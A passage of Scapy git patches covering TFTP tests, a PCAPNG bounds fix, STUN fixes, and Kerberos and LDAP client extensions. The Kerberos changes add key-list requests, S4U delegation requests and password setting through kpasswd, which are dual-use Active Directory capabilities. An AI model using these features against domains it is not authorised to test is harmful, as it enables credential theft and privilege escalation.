(b"P" * 767 + b"Scapy <3") + += TFTP_write() automaton error +~ linux + +class MockWriteSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] + +tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2807, + ll=MockWriteSocket, + recvsock=MockWriteSocket) + +try: + tftp_write.run() + assert False +except Automaton.ErrorState as e: + assert "Reached ERROR" in str(e) + assert "ERROR Access violation" in str(e) + + += TFTP_WRQ_server() automaton +~ linux + +class MockWRQSocket(MockTFTPSocket): + packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_WRQ(filename="scapy.txt"), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=1) / ("P" * 512), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=2) / "<3"] + +tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, + ll=MockWRQSocket, + recvsock=MockWRQSocket) +assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 512 + b"<3")) + += TFTP_WRQ_server() automaton with options +~ linux + +class MockWRQSocket(MockTFTPSocket): + packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_WRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=1) / ("P" * 100), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=2) / "<3"] + +tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, + ll=MockWRQSocket, + recvsock=MockWRQSocket) +assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 100 + b"<3")) + += TFTP_RRQ_server() automaton +~ linux + +sent_data = "P" * 512 + "<3" +import tempfile +filename = tempfile.mktemp(suffix=".txt") +fdesc = open(filename, "w") +fdesc.write(sent_data) +fdesc.close() + +received_data = "" + +class MockRRQSocket(MockTFTPSocket): + packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename=filename[5:]) / TFTP_Options(), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=1), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=2) ] + def send(self, *args, **kargs): + if len(args): + pkt = args[0] + if TFTP_DATA in pkt: + global received_data + received_data += pkt[Raw].load.decode("utf-8") + +tftp_rrq = TFTP_RRQ_server(ip="1.2.3.4", sport=0x2807, dir="/tmp/", serve_one=True, + ll=MockRRQSocket, + recvsock=MockRRQSocket, debug=4) +tftp_rrq.run() +assert received_data == sent_data + +import os +os.unlink(filename) diff --git a/test/tftp.uts b/test/tftp.uts deleted file mode 100644 index 5ad435060a9..00000000000 --- a/test/tftp.uts +++ /dev/null @@ -1,174 +0,0 @@ -% Regression tests for TFTP - -# More information at http://www.secdev.org/projects/UTscapy/ - -+ TFTP coverage tests - -= Test answers - -assert TFTP_DATA(block=1).answers(TFTP_RRQ()) -assert not TFTP_WRQ().answers(TFTP_RRQ()) -assert not TFTP_RRQ().answers(TFTP_WRQ()) -assert TFTP_ACK(block=1).answers(TFTP_DATA(block=1)) -assert not TFTP_ACK(block=0).answers(TFTP_DATA(block=1)) -assert TFTP_ACK(block=0).answers(TFTP_RRQ()) -assert not TFTP_ACK().answers(TFTP_ACK()) -assert TFTP_ERROR().answers(TFTP_DATA()) and TFTP_ERROR().answers(TFTP_ACK()) -assert TFTP_OACK().answers(TFTP_WRQ()) - -+ TFTP Automatons -~ linux - -= Utilities -~ linux - -from scapy.automaton import select_objects - -class MockTFTPSocket(object): - packets = [] - def recv(self, n=None): - pkt = self.packets.pop(0) - return pkt - def send(self, *args, **kargs): - pass - def close(self): - pass - @classmethod - def select(classname, inputs, remain): - test = [s for s in inputs if isinstance(s, classname)] - if test: - if len(test[0].packets): - return test - else: - inputs = [s for s in inputs if not isinstance(s, classname)] - return select_objects(inputs, remain) - - -= TFTP_read() automaton -~ linux - -class MockReadSocket(MockTFTPSocket): - packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=1) / ("P" * 512), - IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_DATA(block=2) / "<3"] - -tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, - ll=MockReadSocket, - recvsock=MockReadSocket, debug=5) - -res = tftp_read.run() -assert res == (b"P" * 512 + b"<3") - -= TFTP_read() automaton error -~ linux - -class MockReadSocket(MockTFTPSocket): - packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] - -tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, - ll=MockReadSocket, - recvsock=MockReadSocket) - -try: - tftp_read.run() - assert False -except Automaton.ErrorState as e: - assert "Reached ERROR" in str(e) - assert "ERROR Access violation" in str(e) - - -= TFTP_write() automaton -~ linux - -data_received = b"" - -class MockWriteSocket(MockTFTPSocket): - packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ACK(block=0), - IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ACK(block=1) ] - def send(self, *args, **kargs): - if len(args) and Raw in args[0]: - global data_received - data_received += args[0][Raw].load - -tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2807, - ll=MockWriteSocket, - recvsock=MockWriteSocket) - -tftp_write.run() -assert data_received == (b"P" * 767 + b"Scapy <3") - -= TFTP_write() automaton error -~ linux - -class MockWriteSocket(MockTFTPSocket): - packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] - -tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2807, - ll=MockWriteSocket, - recvsock=MockWriteSocket) - -try: - tftp_write.run() - assert False -except Automaton.ErrorState as e: - assert "Reached ERROR" in str(e) - assert "ERROR Access violation" in str(e) - - -= TFTP_WRQ_server() automaton -~ linux - -class MockWRQSocket(MockTFTPSocket): - packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_WRQ(filename="scapy.txt"), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=1) / ("P" * 512), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=2) / "<3"] - -tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, - ll=MockWRQSocket, - recvsock=MockWRQSocket) -assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 512 + b"<3")) - -= TFTP_WRQ_server() automaton with options -~ linux - -class MockWRQSocket(MockTFTPSocket): - packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_WRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=1) / ("P" * 100), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=2) / "<3"] - -tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, - ll=MockWRQSocket, - recvsock=MockWRQSocket) -assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 100 + b"<3")) - -= TFTP_RRQ_server() automaton -~ linux - -sent_data = "P" * 512 + "<3" -import tempfile -filename = tempfile.mktemp(suffix=".txt") -fdesc = open(filename, "w") -fdesc.write(sent_data) -fdesc.close() - -received_data = "" - -class MockRRQSocket(MockTFTPSocket): - packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename=filename[5:]) / TFTP_Options(), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=1), - IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=2) ] - def send(self, *args, **kargs): - if len(args): - pkt = args[0] - if TFTP_DATA in pkt: - global received_data - received_data += pkt[Raw].load.decode("utf-8") - -tftp_rrq = TFTP_RRQ_server(ip="1.2.3.4", sport=0x2807, dir="/tmp/", serve_one=True, - ll=MockRRQSocket, - recvsock=MockRRQSocket) -tftp_rrq.run() -assert received_data == sent_data - -import os -os.unlink(filename) From 9a1ce8475ffa875925d06fa8fd8e99d009fc254a Mon Sep 17 00:00:00 2001 From: tf2spi Date: Mon, 31 Mar 2025 03:16:03 -0400 Subject: [PATCH 1451/1632] Pcapng option bounds check (#4699) * Fix PCAPNG options bounds check Bounds check in PcapNG options is off-by-one, meaning that tightly packed options accidentally truncate the last option. Use right comparison to get that last option. * Add regression test for PCAPNG options bounds --- scapy/utils.py | 2 +- test/regression.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 9710d36eefd..c86b09cbf72 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1800,7 +1800,7 @@ def _read_options(self, options): warning("PcapNg: options header is too small " "%d !" % len(options)) raise EOFError - if code != 0 and 4 + length < len(options): + if code != 0 and 4 + length <= len(options): opts[code] = options[4:4 + length] if code == 0: if length != 0: diff --git a/test/regression.uts b/test/regression.uts index 4a959571b9a..3cd10f1fd32 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2348,6 +2348,11 @@ file = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x0 l = rdpcap(file) assert len(l) == 0 or ARP in l[0] +# Read PCAPNG file with tightly packed comment option, no End of Options +file = BytesIO(b'\n\r\r\n\x1c\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x1c\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x04\x00\x14\x00\x00\x00\x06\x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x08\x00Helloooo,\x00\x00\x00') +l = rdpcap(file) +assert len(l) == 1 and l[0].comment == b'Helloooo' + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) From be3cfbdaaaa507db82c989c46f8b03b33586a511 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 31 Mar 2025 09:27:59 +0200 Subject: [PATCH 1452/1632] Kerberos improvements, bug fixes in LDAP (#4709) --- scapy/config.py | 14 ++++++---- scapy/layers/dcerpc.py | 18 ++++++------ scapy/layers/kerberos.py | 37 ++++++++++++++++++++---- scapy/layers/ldap.py | 13 +++++---- scapy/layers/msrpce/msdrsr.py | 48 ++++++++++++++++++++++++++++++++ scapy/layers/msrpce/rpcclient.py | 3 +- scapy/layers/smbclient.py | 2 +- scapy/modules/ticketer.py | 42 ++++++++++++++++++++++++---- 8 files changed, 144 insertions(+), 33 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index e047aaf391a..8cfd828673d 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -619,11 +619,15 @@ def load(self): for k, v in distr.metadata.items() if k == 'Classifier' ): try: - pkg = next( - k - for k, v in importlib.metadata.packages_distributions().items() - if distr.name in v - ) + # Python 3.13 raises an internal warning when calling this + with warnings.catch_warnings(): + warnings.filterwarnings("ignore", category=DeprecationWarning) + pkg = next( + k + for k, v in + importlib.metadata.packages_distributions().items() + if distr.name in v + ) except KeyError: pkg = distr.name if pkg in self._loaded: diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 215281c2946..8174d4ff354 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -1805,12 +1805,14 @@ def m2i(self, pkt, m): return self.cls(m, ndr64=pkt.ndr64, ndrendian=pkt.ndrendian, _parent=pkt) -# class _NDRPacketPadField(PadField): -# def padlen(self, flen, pkt): -# if pkt.ndr64: -# return -flen % self._align[1] -# else: -# return 0 +class _NDRPacketPadField(PadField): + # [MS-RPCE] 2.2.5.3.4.1 Structure with Trailing Gap + # Structures have extra alignment/padding in NDR64. + def padlen(self, flen, pkt): + if pkt.ndr64: + return -flen % self._align[1] + else: + return 0 class NDRPacketField(NDRConstructedType, NDRAlign): @@ -1819,9 +1821,7 @@ def __init__(self, name, default, pkt_cls, **kwargs): self.fld = _NDRPacketField(name, default, pkt_cls=pkt_cls, **kwargs) NDRAlign.__init__( self, - # There is supposed to be padding after a struct in NDR64? - # _NDRPacketPadField(fld, align=pkt_cls.ALIGNMENT), - self.fld, + _NDRPacketPadField(self.fld, align=pkt_cls.ALIGNMENT), align=pkt_cls.ALIGNMENT, ) NDRConstructedType.__init__(self, pkt_cls.fields_desc) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 2f65ba1bf5c..7fae9f6e40b 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -695,10 +695,14 @@ def m2i(self, pkt, s): if pkt.padataType.val in _PADATA_CLASSES: cls = _PADATA_CLASSES[pkt.padataType.val] if isinstance(cls, tuple): - is_reply = ( - pkt.underlayer.underlayer is not None - and isinstance(pkt.underlayer.underlayer, KRB_ERROR) - ) or isinstance(pkt.underlayer, (KRB_AS_REP, KRB_TGS_REP)) + parent = pkt.underlayer or pkt.parent + is_reply = False + if parent is not None: + if isinstance(parent, (KRB_AS_REP, KRB_TGS_REP)): + is_reply = True + else: + parent = parent.underlayer or parent.parent + is_reply = isinstance(parent, KRB_ERROR) cls = cls[is_reply] if not val[0].val: return val @@ -1803,15 +1807,23 @@ def m2i(self, pkt, s): # 25: KDC_ERR_PREAUTH_REQUIRED # 36: KRB_AP_ERR_BADMATCH return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [6, 7, 13, 18, 29, 41, 60]: + elif pkt.errorCode.val in [6, 7, 12, 13, 18, 29, 41, 60]: # 6: KDC_ERR_C_PRINCIPAL_UNKNOWN # 7: KDC_ERR_S_PRINCIPAL_UNKNOWN + # 12: KDC_ERR_POLICY # 13: KDC_ERR_BADOPTION # 18: KDC_ERR_CLIENT_REVOKED # 29: KDC_ERR_SVC_UNAVAILABLE # 41: KRB_AP_ERR_MODIFIED # 60: KRB_ERR_GENERIC - return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] + try: + return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] + except BER_Decoding_Error: + if pkt.errorCode.val in [18]: + # Some types can also happen in FAST sessions + # 18: KDC_ERR_CLIENT_REVOKED + return MethodData(val[0].val, _underlayer=pkt), val[1] + raise elif pkt.errorCode.val == 69: # KRB_AP_ERR_USER_TO_USER_REQUIRED return KRB_TGT_REP(val[0].val, _underlayer=pkt), val[1] @@ -2669,6 +2681,7 @@ def __init__( armor_ticket=None, armor_ticket_upn=None, armor_ticket_skey=None, + key_list_req=[], etypes=None, port=88, timeout=5, @@ -2769,6 +2782,7 @@ def __init__( self.armor_ticket = armor_ticket self.armor_ticket_upn = armor_ticket_upn self.armor_ticket_skey = armor_ticket_skey + self.key_list_req = key_list_req self.renew = renew self.additional_tickets = additional_tickets # U2U + S4U2Proxy self.u2u = u2u # U2U @@ -3130,6 +3144,17 @@ def tgs_req(self): # "kdc-options field: MUST include the new cname-in-addl-tkt options flag" kdc_req.kdcOptions.set(14, 1) + # [MS-KILE] 2.2.11 KERB-KEY-LIST-REQ + if self.key_list_req: + padata.append( + PADATA( + padataType=ASN1_INTEGER(161), # KERB-KEY-LIST-REQ + padataValue=KERB_KEY_LIST_REQ(keytypes=[ + ASN1_INTEGER(x) for x in self.key_list_req + ]) + ) + ) + # 3. Build the AP-req inside a PA apreq = KRB_AP_REQ(ticket=self.ticket, authenticator=EncryptedData()) pa_tgs_req = PADATA( diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 43ee02347e7..9cac9e6470d 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -1811,6 +1811,7 @@ def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): else: port = 389 sock = socket.socket() + self.timeout = timeout sock.settimeout(timeout) if self.verb: print( @@ -2151,7 +2152,7 @@ def search( filter: str = "", scope=0, derefAliases=0, - sizeLimit=3000, + sizeLimit=300000, timeLimit=3000, attrsOnly=0, attributes: List[str] = [], @@ -2202,7 +2203,7 @@ def search( controlType="1.2.840.113556.1.4.319", criticality=True, controlValue=LDAP_realSearchControlValue( - size=500, # paging to 500 per 500 + size=200, # paging to 200 per 200 cookie=cookie, ), ) @@ -2211,7 +2212,7 @@ def search( else [] ) ), - timeout=3, + timeout=self.timeout, ) if LDAP_SearchResponseResultDone not in resp: resp.show() @@ -2294,7 +2295,7 @@ def modify( changes=changes, ), controls=controls, - timeout=3, + timeout=self.timeout, ) if ( LDAP_ModifyResponse not in resp.protocolOp @@ -2341,7 +2342,7 @@ def add( attributes=attributes, ), controls=controls, - timeout=3, + timeout=self.timeout, ) if LDAP_AddResponse not in resp.protocolOp or resp.protocolOp.resultCode != 0: raise LDAP_Exception( @@ -2382,7 +2383,7 @@ def modifydn( deleteoldrdn=deleteoldrdn, ), controls=controls, - timeout=3, + timeout=self.timeout, ) if ( LDAP_ModifyDNResponse not in resp.protocolOp diff --git a/scapy/layers/msrpce/msdrsr.py b/scapy/layers/msrpce/msdrsr.py index 31ab4f0e1bb..d447c6bdecb 100644 --- a/scapy/layers/msrpce/msdrsr.py +++ b/scapy/layers/msrpce/msdrsr.py @@ -8,12 +8,60 @@ """ import uuid +from dataclasses import dataclass + from scapy.packet import Packet from scapy.fields import LEIntField, FlagsField, UUIDField, UTCTimeField +from scapy.volatile import RandShort +from scapy.asn1.asn1 import ASN1_OID from scapy.layers.msrpce.raw.ms_drsr import UUID from scapy.layers.msrpce.raw.ms_drsr import * # noqa: F403,F401 +# [MS-DRSR] sect 5.16.4 ATTRTYP-to-OID Conversion + + +@dataclass +class Prefix: + prefixString: str + prefixIndex: int + + +def MakeAttid(t, o): + """ + MakeAttid per [MS-DRSR] sect 5.16.4 + """ + ToBinary = lambda x: bytes(ASN1_OID(x)) + + lastValue = int(o.split(".")[-1]) + + # "convert the dotted form of OID into a BER encoded binary" + binaryOID = ToBinary(o) + + # "get the prefix of the OID" + if lastValue < 128: + oidPrefix = binaryOID[:-1] + else: + oidPrefix = binaryOID[:-2] + + lowerWord = lastValue % 16384 + if lastValue >= 16384: + lowerWord += 32768 + try: + upperWord = next(x.prefixIndex for x in t if x.prefixString == oidPrefix) + except StopIteration: + # AddPrefixTableEntry + upperWord = int(RandShort()) + t.append( + Prefix( + prefixString=oidPrefix, + prefixIndex=upperWord, + ) + ) + + return upperWord * 65536 + lowerWord + + # [MS-DRSR] sect 5.39 DRS_EXTENSIONS_INT diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 1c1e87ba23c..5a62498036d 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -490,6 +490,7 @@ def connect_and_bind( ip, interface, port=None, + timeout=5, smb_kwargs={}, ): """ @@ -527,7 +528,7 @@ def connect_and_bind( else: return # 2. connect to the SMB server - self.connect(ip, port=port, smb_kwargs=smb_kwargs) + self.connect(ip, port=port, timeout=timeout, smb_kwargs=smb_kwargs) # 3. open the new named pipe self.open_smbpipe(pipename) # Bind in RPC diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index e543008bf4e..d036c5bf8be 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1229,7 +1229,7 @@ def __init__( ) try: # Wrap with SMB_SOCKET - self.smbsock = SMB_SOCKET(self.sock) + self.smbsock = SMB_SOCKET(self.sock, timeout=self.timeout) # Wait for either the atmt to fail, or the smb_sock_ready to timeout _t = time.time() while True: diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 735fbd17d9e..83c11c623ae 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -358,16 +358,25 @@ def open_file(self, fname): with open(self.fname, "rb") as fd: self.ccache = CCache(fd.read()) - def save(self, fname=None): + def save(self, fname=None, i=None): """ Save opened CCache file + + :param fname: if provided, save to a specific file. + :param i: if provided, only save the ticket n°i. """ if fname: self.fname = fname if not self.fname: raise ValueError("No file opened. Specify the 'fname' argument !") + if i is not None: + ccache = self.ccache.copy() + ccache.credentials = [ccache.credentials[i]] + data = bytes(ccache) + else: + data = bytes(self.ccache) with open(self.fname, "wb") as fd: - return fd.write(bytes(self.ccache)) + return fd.write(data) def show(self, utc=False): """ @@ -502,6 +511,14 @@ def update_ticket(self, i, decTkt, resign=False, hash=None, kdc_hash=None): decTkt, ) + def remove_krb(self, i): + """ + Remove a ticket from the store. + + :param i: the ticket to remove. + """ + del self.ccache.credentials[i] + def import_krb(self, res, key=None, hash=None, _inplace=None): """ Import the result of krb_[tgs/as]_req or a Ticket into the CCache. @@ -2151,12 +2168,20 @@ def request_st( additional_tickets=[], fast=False, armor_with=None, + for_user=None, + s4u2proxy=None, **kwargs, ): """ - Request a Kerberos TS and add it to the local CCache using another ticket + Request a Kerberos TS and add it to the local CCache using another ticket. - :param i: the ticket/sessionkey to use in the TGS request + :param i: the index of the ticket/sessionkey to use in the TGS request. + :param spn: the SPN to request a ticket for. + :param armor_with: the index of the ticket/sessionkey to armor this request. + :param s4u2proxy: if an index, the index of the additional ticket to send along + a S4U2PROXY request. If True, it will use additional_tickets + as usual. + :param for_user: if provided, requests S4U2SELF for that user. See :func:`~scapy.layers.kerberos.krb_tgs_req` for the the other parameters. """ @@ -2170,6 +2195,11 @@ def request_st( armor_with ) + # If `s4u2proxy` is an index, get the ticket to armor with + if isinstance(s4u2proxy, int): + additional_tickets.append(self.export_krb(s4u2proxy)[0]) + s4u2proxy = True + res = krb_tgs_req( upn, spn, @@ -2180,6 +2210,7 @@ def request_st( realm=realm, additional_tickets=additional_tickets, fast=fast, + for_user=for_user, armor_ticket=armor_ticket, armor_ticket_upn=armor_ticket_upn, armor_ticket_skey=armor_ticket_skey, @@ -2190,7 +2221,7 @@ def request_st( self.import_krb(res) - def kpasswdset(self, i, targetupn=None): + def kpasswdset(self, i, targetupn=None, newpassword=None): """ Use kpasswd in 'Set Password' mode to set the password of an account. @@ -2203,6 +2234,7 @@ def kpasswdset(self, i, targetupn=None): setpassword=True, ticket=ticket, key=sessionkey, + newpassword=newpassword, ) def renew(self, i, ip=None, additional_tickets=[], **kwargs): From 8f9c7a6069415a166d80f6c8f694f78e8ce459ed Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 31 Mar 2025 09:28:10 +0200 Subject: [PATCH 1453/1632] Support sessions in Automaton (#4701) --- scapy/automaton.py | 9 +++++++-- scapy/layers/tftp.py | 7 +++++-- scapy/libs/extcap.py | 2 ++ test/scapy/layers/tftp.uts | 2 +- 4 files changed, 15 insertions(+), 5 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index b1f37bef510..2aae9168725 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -929,6 +929,7 @@ def __init__(self, *args, **kargs): self.ioin = {} self.ioout = {} self.packets = PacketList() # type: PacketList + self.atmt_session = kargs.pop("session", None) for n in self.__class__.ionames: extfd = external_fd.get(n) if not isinstance(extfd, tuple): @@ -956,11 +957,12 @@ def __init__(self, *args, **kargs): self.start() - def parse_args(self, debug=0, store=0, **kargs): - # type: (int, int, Any) -> None + def parse_args(self, debug=0, store=0, session=None, **kargs): + # type: (int, int, Any, Any) -> None self.debug_level = debug if debug: conf.logLevel = logging.DEBUG + self.atmt_session = session self.socket_kargs = kargs self.store_packets = store @@ -1451,6 +1453,9 @@ def _do_iter(self): else: # There isn't. Therefore, it's a closing condition. raise EOFError("Socket ended arbruptly.") + if self.atmt_session is not None: + # Apply session if provided + pkt = self.atmt_session.process(pkt) if pkt is not None: if self.master_filter(pkt): self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501 diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index e4034b51f7b..a5ccb12af66 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -26,6 +26,7 @@ from scapy.automaton import ATMT, Automaton from scapy.base_classes import Net from scapy.config import conf +from scapy.sessions import IPSession from scapy.volatile import RandShort from scapy.layers.inet import UDP, IP @@ -347,9 +348,10 @@ class TFTP_WRQ_server(Automaton): """ def parse_args(self, ip=None, sport=None, *args, **kargs): - if "iface" not in kargs: + if "iface" not in kargs and ip: ip = str(Net(ip)) kargs["iface"] = conf.route.route(ip)[0] + kargs.setdefault("session", IPSession()) Automaton.parse_args(self, *args, **kargs) self.ip = ip self.sport = sport @@ -440,9 +442,10 @@ class TFTP_RRQ_server(Automaton): """ def parse_args(self, store=None, joker=None, dir=None, ip=None, sport=None, serve_one=False, **kargs): # noqa: E501 - if "iface" not in kargs: + if "iface" not in kargs and ip: ip = str(Net(ip)) kargs["iface"] = conf.route.route(ip)[0] + kargs.setdefault("session", IPSession()) Automaton.parse_args(self, **kargs) if store is None: store = {} diff --git a/scapy/libs/extcap.py b/scapy/libs/extcap.py index be0e6b05663..60c6977a059 100644 --- a/scapy/libs/extcap.py +++ b/scapy/libs/extcap.py @@ -52,6 +52,8 @@ def _extcap_call(prog: str, """ p = subprocess.Popen( [prog] + args, + # On Windows, we must be in the Wireshark/ folder. + cwd=pathlib.Path(prog).parent.parent, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True ) diff --git a/test/scapy/layers/tftp.uts b/test/scapy/layers/tftp.uts index eac31201629..c54e271a08e 100644 --- a/test/scapy/layers/tftp.uts +++ b/test/scapy/layers/tftp.uts @@ -18,7 +18,7 @@ assert TFTP_OACK().answers(TFTP_WRQ()) = TFTP Options -x=IP()/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) +x=IP(src="127.0.0.1")/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) assert raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' y=IP(raw(x)) y[TFTP_Option].oname From 0a98c1964e42c00ab653d5203c47cbef80798c94 Mon Sep 17 00:00:00 2001 From: Simon Holesch <8659229+holesch@users.noreply.github.com> Date: Tue, 8 Apr 2025 20:49:43 +0200 Subject: [PATCH 1454/1632] Stun improvements (#4712) * STUN: Fix building binding response Building a binding success response with an XOR-MAPPED-ADDRESS attribute filed with: File "/home/simon/src/scapy/scapy/contrib/stun.py", line 152, in i2m return struct.pack(">i", struct.unpack(">i", inet_aton(x)) ^ MAGIC_COOKIE) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~ TypeError: While dissecting field 'attributes': While dissecting field 'xip': unsupported operand type(s) for ^: 'tuple' and 'int' Fixed by properly handling the return value of struct.unpack (a tuple with one int). * STUN: Support IPv6 in binding response The XOR-MAPPED-ADDRESS attribute can contain either IPv4 or IPv6 addresses in the xip field. The address_family field selects the type of the xip field. * STUN: Support MAPPED-ADDRESS attribute Even RFC 8489 compliant STUN servers respond with the non-XORed MAPPED-ADDRESS attribute, if the magic cookie in the request doesn't have the expected value. * STUN: Fix UDP/TCP layer binding STUN responses weren't properly dissected, because the protocol was only bound to the destination port. Fixed by binding both source and destination port number 3478 to the STUN protocol. Also set both port numbers when building messages, otherwise the UDP/TCP default source port (DNS / FTP) would be used. --- scapy/contrib/stun.py | 67 ++++++++++++++++++++++++--- test/contrib/stun.uts | 102 ++++++++++++++++++++++++++++++++++++++++-- 2 files changed, 158 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/stun.py b/scapy/contrib/stun.py index 9129204a343..ee243551597 100644 --- a/scapy/contrib/stun.py +++ b/scapy/contrib/stun.py @@ -20,7 +20,7 @@ from scapy.layers.inet import UDP, TCP from scapy.config import conf -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet, bind_bottom_up, bind_top_down from scapy.utils import inet_ntoa, inet_aton from scapy.fields import ( BitField, @@ -39,7 +39,9 @@ XLongField, XIntField, XBitField, - IPField + IPField, + IP6Field, + MultipleTypeField, ) MAGIC_COOKIE = 0x2112A442 @@ -149,7 +151,27 @@ def m2i(self, pkt, x): def i2m(self, pkt, x): if x is None: return b"\x00\x00\x00\x00" - return struct.pack(">i", struct.unpack(">i", inet_aton(x)) ^ MAGIC_COOKIE) + return struct.pack(">i", struct.unpack(">i", inet_aton(x))[0] ^ MAGIC_COOKIE) + + +class XorIp6(IP6Field): + + def m2i(self, pkt, x): + addr = self._xor_address(pkt, x) + return super().m2i(pkt, addr) + + def i2m(self, pkt, x): + addr = 